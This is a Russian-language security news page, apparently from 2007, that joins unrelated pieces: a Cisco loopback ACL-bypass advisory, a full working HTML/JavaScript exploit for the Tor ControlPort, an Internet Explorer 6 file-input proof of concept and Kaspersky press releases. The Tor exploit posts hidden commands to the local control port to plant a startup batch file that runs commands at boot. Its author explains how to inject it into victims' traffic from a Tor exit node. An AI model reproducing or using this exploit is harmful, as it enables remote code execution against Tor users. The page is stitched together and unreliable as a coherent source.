–=WN13=–

Программа:
Cisco 7600 Series версии до 12.2(33)SXH
Cisco Catalyst 6500 Series версии до 12.2(33)SXH

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности.

Уязвимость существует из-за того, что пакеты, предназначенные для сети 127.0.0.0/8, могут быть получены и обработаны с помощью Supervisor модуля или Multilayer Switch Feature Card (MSFC). Злоумышленник может обойти существующие списки контроля доступа. Для удачной эксплуатации уязвимости требуется, чтобы системы были запущены в режиме Hybrid Mode (ПО Catalyst OS (CatOS) на Supervisor Engine и IOS Software на MSFC) или в режиме Native Mode (IOS Software на Supervisor Engine и MSFC).

URL производителя: www.cisco.com

Решение: Установите последнюю версию 12.2(33)SXH с сайта производителя.

Источник:
Cisco Security Response: Catalyst 6500 and Cisco 7600 Series Devices Accessible via Loopback Address

Цель: Tor версти до 0.1.2.16
Воздействие: Обход ограничений безопасности

<!–

Tor < 0.1.2.16 with ControlPort enabled ( not default )
Exploit for Tor ControlPort “torrc” Rewrite Vulnerability http://secunia.com/advisories/26301

Rewrites the torrc to log to a different location: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\t.bat
Also enables debug logging, and an erroneous ExitPolicy looking something like this: reject*:1337\’&’ calc.exe this will output:
[debug] parse_addr_policy(): Adding new entry ‘reject*:1337′& calc.exe to the debug log -> t.bat which will run calc.exe on next boot.

This is not very silent though, t.bat will contain something like 45 rows of crap which the user will see in about 1 sec, drop me a mail if you have a better way.

Either have a TOR user visit this HTML or inject it into her traffic when you’re a TOR exit.
If you inject, just replace </HEAD> with everything in <HEAD> + </HEAD> ( that’s why I tried to fit everything inside <HEAD />), and fix Content-Length

// elgCrew _AT_ safe-mail.net
–>

<html>
<head>
<script language=”javascript”>

window.onload = function()
{

cmd = ‘cls & echo off & ping -l 1329 my.tcpdump.co -n 1 -w 1 > NUL & del t.bat > NUL & exit’;
inject = ‘\r\nAUTHENTICATE\r\nSETCONF Log=\”debug-debug file C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\t.bat\”\r\nSAVECONF\r\nSIGNAL RELOAD\r\nSETCONF ExitPolicy=\”reject*:1337\\\’&’ + cmd + ‘&\”\r\nSETCONF Log=\”info file c:\\\\tor.txt\”\r\nSAVECONF\r\nSIGNAL RELOAD\r\n’;
form51.area51.value = inject;
document.form51.submit();
}
</script>

<form target=”hiddenframe” name=”form51″ action=”http://localhost.mil.se:9051″ method=POST enctype=”multipart/form-data”>
<input type=hidden name=area51>
</form>
<iframe width=0 height=0 frameborder=0 name=”hiddenframe”></iframe>
</head>

<body>
<pre>
—-
| y0! |
—-
\ \_\_ _/_/
\ (oo)\_______
|_|\ )*
||—-w |
|| ||
</pre>
</body>
</html>

Программа: Microsoft Internet Explorer 6.x

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к важным данным.

Уязвимость существует из-за ошибки при обработке события “OnKeyDown”. Подробное описание уязвимости:
www.securitylab.ru/vulnerability/298727.php

Пример:

<script>

function Clear() {
document.getElementById(”label1″).htmlFor=”file1″;
document.getElementById(”text1″).focus();
}

function Down() {
document.getElementById(”file1″).focus();
}

</script>

<input type=”file” id=”file1″ name=”file1″ onkeydown=”Clear()” onkeyup=”Clear()” />
<label id=”label1″ name=”label1″></label>
<br />
<textarea name=”text1″ id=”text1″ onkeydown=”Down()”>
</textarea>

URL производителя: www.microsoft.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Kaspersky Total Space Security Государственной Третьяковской галерее. В рамках данного< проекта, который был реализован совместно с партнером “Лаборатории
Касперского”, компанией “АйТи Партнер”, Третьяковская галерея приобрела 500 двухлетних лицензий для защиты различных IT-узлов своей сети.
“Мы предъявляем очень высокие требования к антивирусной безопасности. Необходимым условием является защита всех элементов сети,включая рабочие станции, файловые и почтовые сервера, межсетевые экраны,
мобильные устройства, а также наличие централизованных средств
управления антивирусной защитой, - отмечает Сергей Хрусталев, заместитель генерального директора Государственной Третьяковской галереи по информационным технологиям. - Кроме того, для нас, как государственной организации, обязательным условием является наличие у антивирусного комплекса сертификатов ФСТЭК России и ФСБ России,удостоверяющих, что продукт может использоваться для защиты информации,составляющей государственную тайну. Всем этим условиям полностью удовлетворяет продукт “Лаборатории Касперского”.”
Kaspersky Total Space Security
(http://www.kaspersky.ru/total_space_security) - решение для целостной защиты корпоративных сетей любого масштаба и сложности от всех видов современных интернет-угроз. Решение обеспечивает контроль входящих и исходящих потоков данных - электронной почты, интернет-трафика и всех сетевых взаимодействий. Продукт включает компоненты для защиты рабочих станций и мобильных устройств, обеспечивает мгновенный и безопасный доступ пользователей к информационным ресурсам компании и сети Интернет, а также гарантирует безопасные коммуникации по электронной почте.
“Защита от компьютерных угроз является одной из важнейших составляющих безопасности любой организации, - говорит Сергей Земков, директор по продажам “Лаборатории Касперского” в России, странах СНГ и Балтии. - А защита компьютерной сети и данных одного из самых больших и известнейших музеев мира -Государственной Третьяковской галереи - чрезвычайно важная и ответственная задача. Мы очень рады, что именно продуктам “Лаборатории Касперского” доверена безопасность информационного пространства нашей Третьяковки.” О Государственной Третьяковской галерее
Государственная Третьяковская галерея - один из известнейших художественных музеев мира. Основанная в 1856 году, галерея за время своего существования стала крупнейшим музеем России, насчитывающим в своей коллекции более 130000 произведений живописи, скульптуры и графики.

“Лаборатория Касперского”, ведущий производитель систем защиты от вредоносного и нежелательного ПО, хакерских атак и спама, сообщает о публикации традиционного полугодового отчета под названием “Спам в первом полугодии 2007 года”.В этом отчете, подготовленном руководителем группы спам-аналитиков
компании Анной Власовой, приводится информация об основных тенденциях,
которые наблюдались в области спам-технологий за отчетный период. В частности, в материале рассказывается о том, что в 2007 году спамеры стали экспериментировать с новыми способами демонстрации пользователю спамовой картинки. Итоги полугодия в целом показали, что “графический” спам оказывается все менее эффективным. Спам-аналитики “Лаборатории Касперского” не могли обойти вниманием и появление спама с вложениями в форматах pdf и fdf. В отчете также приводятся тематические категории-лидеры спам-рассылок за прошедшие шесть месяцев.Одним из значимых событий истекшего периода стали атаки фишеров,направленные на пользователей российских сервисов - системы
онлайн-банкинга “Альфа-Банка” и электронной платежной системы “Яндекс.Деньги”.
Полную версию отчета вы найдете на сайте Viruslist.com(http://www.viruslist.ru/analysis?pubid=204007568).
Также вы можете прочитать summary данного материала на нашем сайте в разделе “Мнение эксперта”
(http://www.kaspersky.ru/reading_room?chapter=207367580).